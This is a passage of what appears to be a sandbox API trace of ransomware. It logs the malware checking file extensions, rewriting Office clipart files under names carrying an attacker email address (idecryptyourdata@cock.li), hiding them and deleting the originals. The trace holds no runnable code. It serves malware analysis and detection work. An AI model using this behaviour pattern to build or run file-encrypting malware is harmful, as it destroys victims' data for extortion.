Office\\root\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 68 [0064.140] lstrlenW (lpString=".zip") returned 4 [0064.140] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.140] lstrlenW (lpString=".rar") returned 4 [0064.140] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.140] lstrlenW (lpString=".bz2") returned 4 [0064.140] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.140] lstrlenW (lpString=".7z") returned 3 [0064.140] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.140] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 68 [0064.140] lstrlenW (lpString=".dbf") returned 4 [0064.140] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.140] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 68 [0064.140] lstrlenW (lpString=".1cd") returned 4 [0064.140] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.140] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 68 [0064.140] lstrlenW (lpString=".jpg") returned 4 [0064.140] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.142] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.142] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.142] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00441_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00441_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0064.144] GetLastError () returned 0x0 [0064.144] ReadFile (in: hFile=0x2c8, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0xdc4, lpOverlapped=0x0) returned 1 [0064.153] WriteFile (in: hFile=0x340, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xdd0, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xdd0, lpOverlapped=0x0) returned 1 [0064.154] ReadFile (in: hFile=0x2c8, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.154] WriteFile (in: hFile=0x340, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0064.154] SetEndOfFile (hFile=0x340) returned 1 [0064.154] CloseHandle (hObject=0x340) returned 1 [0064.155] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.155] SetEndOfFile (hFile=0x2c8) returned 1 [0064.156] CloseHandle (hObject=0x2c8) returned 1 [0064.156] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00441_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.156] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00441_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00441_.wmf")) returned 1 [0064.157] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 68 [0064.157] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 68 [0064.157] lstrlenW (lpString=".doc") returned 4 [0064.157] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.157] lstrlenW (lpString=".docx") returned 5 [0064.157] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.157] lstrlenW (lpString=".pdf") returned 4 [0064.157] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.157] lstrlenW (lpString=".xls") returned 4 [0064.157] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.157] lstrlenW (lpString=".xlsx") returned 5 [0064.157] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.157] lstrlenW (lpString=".ppt") returned 4 [0064.157] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.157] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 68 [0064.157] lstrlenW (lpString=".zip") returned 4 [0064.157] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.157] lstrlenW (lpString=".rar") returned 4 [0064.157] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.157] lstrlenW (lpString=".bz2") returned 4 [0064.157] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.157] lstrlenW (lpString=".7z") returned 3 [0064.157] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.157] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 68 [0064.157] lstrlenW (lpString=".dbf") returned 4 [0064.157] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.157] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 68 [0064.157] lstrlenW (lpString=".1cd") returned 4 [0064.157] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.157] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 68 [0064.157] lstrlenW (lpString=".jpg") returned 4 [0064.157] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.158] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.158] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.158] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00444_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00444_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0064.158] GetLastError () returned 0x0 [0064.158] ReadFile (in: hFile=0x2c8, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0xf38, lpOverlapped=0x0) returned 1 [0064.170] WriteFile (in: hFile=0x340, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xf40, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xf40, lpOverlapped=0x0) returned 1 [0064.171] ReadFile (in: hFile=0x2c8, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.171] WriteFile (in: hFile=0x340, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0064.171] SetEndOfFile (hFile=0x340) returned 1 [0064.173] CloseHandle (hObject=0x340) returned 1 [0064.176] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.176] SetEndOfFile (hFile=0x2c8) returned 1 [0064.180] CloseHandle (hObject=0x2c8) returned 1 [0064.185] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00444_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.185] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00444_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00444_.wmf")) returned 1 [0064.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 68 [0064.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 68 [0064.189] lstrlenW (lpString=".doc") returned 4 [0064.189] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.189] lstrlenW (lpString=".docx") returned 5 [0064.189] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.189] lstrlenW (lpString=".pdf") returned 4 [0064.189] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.189] lstrlenW (lpString=".xls") returned 4 [0064.189] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.189] lstrlenW (lpString=".xlsx") returned 5 [0064.189] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.189] lstrlenW (lpString=".ppt") returned 4 [0064.189] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 68 [0064.189] lstrlenW (lpString=".zip") returned 4 [0064.189] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.189] lstrlenW (lpString=".rar") returned 4 [0064.189] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.189] lstrlenW (lpString=".bz2") returned 4 [0064.189] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.189] lstrlenW (lpString=".7z") returned 3 [0064.189] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 68 [0064.189] lstrlenW (lpString=".dbf") returned 4 [0064.189] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 68 [0064.189] lstrlenW (lpString=".1cd") returned 4 [0064.189] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 68 [0064.189] lstrlenW (lpString=".jpg") returned 4 [0064.189] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.195] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.196] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.196] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01603_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01603_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0064.197] GetLastError () returned 0x0 [0064.197] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x1c08, lpOverlapped=0x0) returned 1 [0064.250] WriteFile (in: hFile=0x340, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x1c10, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x1c10, lpOverlapped=0x0) returned 1 [0064.251] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.251] WriteFile (in: hFile=0x340, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0064.251] SetEndOfFile (hFile=0x340) returned 1 [0064.251] CloseHandle (hObject=0x340) returned 1 [0064.252] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.252] SetEndOfFile (hFile=0x384) returned 1 [0064.253] CloseHandle (hObject=0x384) returned 1 [0064.253] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01603_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.253] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01603_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01603_.wmf")) returned 1 [0064.255] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 68 [0064.255] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 68 [0064.255] lstrlenW (lpString=".doc") returned 4 [0064.255] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.255] lstrlenW (lpString=".docx") returned 5 [0064.255] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.255] lstrlenW (lpString=".pdf") returned 4 [0064.255] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.255] lstrlenW (lpString=".xls") returned 4 [0064.256] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.256] lstrlenW (lpString=".xlsx") returned 5 [0064.256] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.256] lstrlenW (lpString=".ppt") returned 4 [0064.256] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.256] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 68 [0064.256] lstrlenW (lpString=".zip") returned 4 [0064.256] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.256] lstrlenW (lpString=".rar") returned 4 [0064.256] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.256] lstrlenW (lpString=".bz2") returned 4 [0064.256] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.256] lstrlenW (lpString=".7z") returned 3 [0064.256] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.256] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 68 [0064.256] lstrlenW (lpString=".dbf") returned 4 [0064.256] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.256] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 68 [0064.256] lstrlenW (lpString=".1cd") returned 4 [0064.256] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.256] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 68 [0064.256] lstrlenW (lpString=".jpg") returned 4 [0064.256] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.266] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.266] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.267] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01638_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01638_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0064.270] GetLastError () returned 0x0 [0064.270] ReadFile (in: hFile=0x368, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x292a, lpOverlapped=0x0) returned 1 [0064.318] WriteFile (in: hFile=0x384, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x2930, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x2930, lpOverlapped=0x0) returned 1 [0064.319] ReadFile (in: hFile=0x368, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.319] WriteFile (in: hFile=0x384, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0064.319] SetEndOfFile (hFile=0x384) returned 1 [0064.319] CloseHandle (hObject=0x384) returned 1 [0064.320] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.320] SetEndOfFile (hFile=0x368) returned 1 [0064.321] CloseHandle (hObject=0x368) returned 1 [0064.321] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01638_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.322] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01638_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01638_.wmf")) returned 1 [0064.322] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 68 [0064.322] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 68 [0064.322] lstrlenW (lpString=".doc") returned 4 [0064.322] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.322] lstrlenW (lpString=".docx") returned 5 [0064.322] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.322] lstrlenW (lpString=".pdf") returned 4 [0064.322] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.322] lstrlenW (lpString=".xls") returned 4 [0064.322] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.322] lstrlenW (lpString=".xlsx") returned 5 [0064.322] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.322] lstrlenW (lpString=".ppt") returned 4 [0064.322] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.322] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 68 [0064.322] lstrlenW (lpString=".zip") returned 4 [0064.322] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.322] lstrlenW (lpString=".rar") returned 4 [0064.322] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.322] lstrlenW (lpString=".bz2") returned 4 [0064.323] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.323] lstrlenW (lpString=".7z") returned 3 [0064.323] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.323] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 68 [0064.323] lstrlenW (lpString=".dbf") returned 4 [0064.323] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.323] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 68 [0064.323] lstrlenW (lpString=".1cd") returned 4 [0064.323] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.323] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 68 [0064.323] lstrlenW (lpString=".jpg") returned 4 [0064.323] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.323] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.323] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.323] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC1.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\classic1.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0064.324] GetLastError () returned 0x0 [0064.324] ReadFile (in: hFile=0x368, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x976, lpOverlapped=0x0) returned 1 [0064.336] WriteFile (in: hFile=0x384, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x980, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x980, lpOverlapped=0x0) returned 1 [0064.337] ReadFile (in: hFile=0x368, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.337] WriteFile (in: hFile=0x384, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0064.337] SetEndOfFile (hFile=0x384) returned 1 [0064.341] CloseHandle (hObject=0x384) returned 1 [0064.373] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.373] SetEndOfFile (hFile=0x368) returned 1 [0064.374] CloseHandle (hObject=0x368) returned 1 [0064.374] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC1.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.375] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC1.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\classic1.wmf")) returned 1 [0064.375] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 68 [0064.375] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 68 [0064.375] lstrlenW (lpString=".doc") returned 4 [0064.375] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.375] lstrlenW (lpString=".docx") returned 5 [0064.375] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1 [0064.375] lstrlenW (lpString=".pdf") returned 4 [0064.375] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.375] lstrlenW (lpString=".xls") returned 4 [0064.375] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.375] lstrlenW (lpString=".xlsx") returned 5 [0064.375] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1 [0064.375] lstrlenW (lpString=".ppt") returned 4 [0064.375] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.375] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 68 [0064.375] lstrlenW (lpString=".zip") returned 4 [0064.376] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.376] lstrlenW (lpString=".rar") returned 4 [0064.376] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.376] lstrlenW (lpString=".bz2") returned 4 [0064.376] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.376] lstrlenW (lpString=".7z") returned 3 [0064.376] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 68 [0064.376] lstrlenW (lpString=".dbf") returned 4 [0064.376] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 68 [0064.376] lstrlenW (lpString=".1cd") returned 4 [0064.376] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 68 [0064.376] lstrlenW (lpString=".jpg") returned 4 [0064.376] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.379] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.380] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.380] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00121_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00121_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), 